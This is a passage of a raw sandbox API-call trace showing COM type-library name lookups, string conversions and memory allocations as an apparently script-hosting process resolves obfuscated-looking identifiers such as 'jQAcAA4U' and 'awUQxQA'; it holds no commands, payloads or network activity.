[0069.997] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="IB_ADAC", lHashVal=0x10c1f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.997] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.997] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.997] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="IB_ADAC", lHashVal=0x10c1f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.997] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2582, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="IB_ADAC") returned 8 [0069.998] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="IB_ADAC", lHashVal=0x10c1f1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.998] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.998] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb2582 | out: _Dst=0x68767a0) returned 0x0 [0069.998] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_IB_ADAC") returned 0x10c575 [0069.998] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_IB_ADAC" | out: _Dst="_B_var_IB_ADAC") returned 0x0 [0069.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_IB_ADAC") returned 15 [0069.998] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.998] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_IB_ADAC", lHashVal=0x10c575, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.998] IUnknown:Release (This=0x665ba50) returned 0xf [0069.998] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.998] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_IB_ADAC", lHashVal=0x10c575, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.998] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.998] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.998] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_IB_ADAC", lHashVal=0x10c575, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.998] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.998] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.998] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_IB_ADAC", lHashVal=0x10c575, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.998] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.998] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.998] IUnknown:Release (This=0x665ba50) returned 0xf [0069.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1a8e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_IB_ADAC") returned 15 [0069.998] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_IB_ADAC", lHashVal=0x10c575, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0) returned 0x0 [0069.999] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2582 | out: _Dst=0x144ec0) returned 0x0 [0069.999] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jQAcAA4U", lHashVal=0x1089d1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb25d2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jQAcAA4U") returned 9 [0069.999] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jQAcAA4U", lHashVal=0x1089d1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb25d2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jQAcAA4U") returned 9 [0069.999] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jQAcAA4U", lHashVal=0x1089d1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.999] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jQAcAA4U") returned 0x1089d1 [0069.999] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="jQAcAA4U" | out: _Dst="jQAcAA4U") returned 0x0 [0069.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="jQAcAA4U") returned 9 [0069.999] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.999] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jQAcAA4U", lHashVal=0x1089d1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.999] IUnknown:Release (This=0x665ba50) returned 0xf [0069.999] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.000] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jQAcAA4U", lHashVal=0x1089d1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.000] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.000] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.000] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jQAcAA4U", lHashVal=0x1089d1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.000] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.000] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.000] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jQAcAA4U", lHashVal=0x1089d1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.000] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb25d2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jQAcAA4U") returned 9 [0070.000] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jQAcAA4U", lHashVal=0x1089d1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.000] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0070.000] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3cb25d2 | out: _Dst=0x68767a0) returned 0x0 [0070.000] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jQAcAA4U") returned 0x1051d9 [0070.000] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_jQAcAA4U" | out: _Dst="_B_var_jQAcAA4U") returned 0x0 [0070.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_jQAcAA4U") returned 16 [0070.000] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.000] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jQAcAA4U", lHashVal=0x1051d9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.000] IUnknown:Release (This=0x665ba50) returned 0xf [0070.000] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.000] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jQAcAA4U", lHashVal=0x1051d9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.000] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.000] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.000] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jQAcAA4U", lHashVal=0x1051d9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.000] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.000] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.000] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jQAcAA4U", lHashVal=0x1051d9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.001] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.001] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.001] IUnknown:Release (This=0x665ba50) returned 0xf [0070.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1abe, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_jQAcAA4U") returned 16 [0070.001] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jQAcAA4U", lHashVal=0x1051d9, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0) returned 0x0 [0070.001] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb25d2 | out: _Dst=0x144ec0) returned 0x0 [0070.001] ITypeComp:RemoteBind (in: This=0x665ba60, szName="awUQxQA", lHashVal=0x109e7c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb25fe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="awUQxQA") returned 8 [0070.001] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="awUQxQA", lHashVal=0x109e7c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb25fe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="awUQxQA") returned 8 [0070.001] ITypeComp:RemoteBind (in: This=0x665bd30, szName="awUQxQA", lHashVal=0x109e7c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.001] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="awUQxQA") returned 0x109e7c [0070.001] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="RAcAAAAZ", cchCount1=-1, lpString2="awUQxQA", cchCount2=-1) returned 3 [0070.001] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="awUQxQA" | out: _Dst="awUQxQA") returned 0x0 [0070.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="awUQxQA") returned 8 [0070.001] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.001] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="awUQxQA", lHashVal=0x109e7c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.001] IUnknown:Release (This=0x665ba50) returned 0xf [0070.001] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.001] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="awUQxQA", lHashVal=0x109e7c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.001] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.002] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.002] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="awUQxQA", lHashVal=0x109e7c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.002] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.002] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.002] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="awUQxQA", lHashVal=0x109e7c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.002] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb25fe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="awUQxQA") returned 8 [0070.002] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="awUQxQA", lHashVal=0x109e7c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.002] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0070.002] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb25fe | out: _Dst=0x68767a0) returned 0x0 [0070.002] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_awUQxQA") returned 0x10a200 [0070.002] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_awUQxQA" | out: _Dst="_B_var_awUQxQA") returned 0x0 [0070.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_awUQxQA") returned 15 [0070.002] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.002] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_awUQxQA", lHashVal=0x10a200, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.002] IUnknown:Release (This=0x665ba50) returned 0xf [0070.002] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.002] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_awUQxQA", lHashVal=0x10a200, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.002] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.002] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.002] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_awUQxQA", lHashVal=0x10a200, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.002] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.002] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.002] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_awUQxQA", lHashVal=0x10a200, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.002] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.002] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.002] IUnknown:Release (This=0x665ba50) returned 0xf [0070.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1aee, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_awUQxQA") returned 15 [0070.003] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_awUQxQA", lHashVal=0x10a200, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x78005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x78005100000000, pDummy=0x0) returned 0x0 [0070.003] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb25fe | out: _Dst=0x144ec0) returned 0x0 [0070.003] ITypeComp:RemoteBind (in: This=0x665ba60, szName="m4kZUXA", lHashVal=0x10c912, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb264e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="m4kZUXA") returned 8 [0070.003] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="m4kZUXA", lHashVal=0x10c912, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb264e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="m4kZUXA") returned 8 [0070.003] ITypeComp:RemoteBind (in: This=0x665bd30, szName="m4kZUXA", lHashVal=0x10c912, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="m4kZUXA") returned 0x10c912 [0070.003] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="m4kZUXA" | out: _Dst="m4kZUXA") returned 0x0 [0070.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="m4kZUXA") returned 8 [0070.003] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.003] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="m4kZUXA", lHashVal=0x10c912, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.003] IUnknown:Release (This=0x665ba50) returned 0xf [0070.003] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.003] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="m4kZUXA", lHashVal=0x10c912, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.003] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.003] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.003] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="m4kZUXA", lHashVal=0x10c912, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.003] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.003] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.004] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="m4kZUXA", lHashVal=0x10c912, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.004] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb264e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="m4kZUXA") returned 8 [0070.004] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="m4kZUXA", lHashVal=0x10c912, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.004] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0070.004] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb264e | out: _Dst=0x68767a0) returned 0x0 [0070.004] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_m4kZUXA") returned 0x10bd15 [0070.004] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_m4kZUXA" | out: _Dst="_B_var_m4kZUXA") returned 0x0 [0070.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_m4kZUXA") returned 15 [0070.004] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.004] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_m4kZUXA", lHashVal=0x10bd15, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.004] IUnknown:Release (This=0x665ba50) returned 0xf [0070.004] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.004] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_m4kZUXA", lHashVal=0x10bd15, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.004] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.004] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.004] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_m4kZUXA", lHashVal=0x10bd15, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.004] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.004] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.004] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_m4kZUXA", lHashVal=0x10bd15, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.004] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.004] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.004] IUnknown:Release (This=0x665ba50) returned 0xf [0070.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1b1e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_m4kZUXA") returned 15 [0070.004] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_m4kZUXA", lHashVal=0x10bd15, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x55005a00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x55005a00000000, pDummy=0x0) returned 0x0 [0070.004] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb264e | out: _Dst=0x144ec0) returned 0x0 [0070.005] ITypeComp:RemoteBind (in: This=0x665ba60, szName="LADBoc", lHashVal=0x10a87e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2626, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="LADBoc") returned 7 [0070.005] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="LADBoc", lHashVal=0x10a87e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.005] 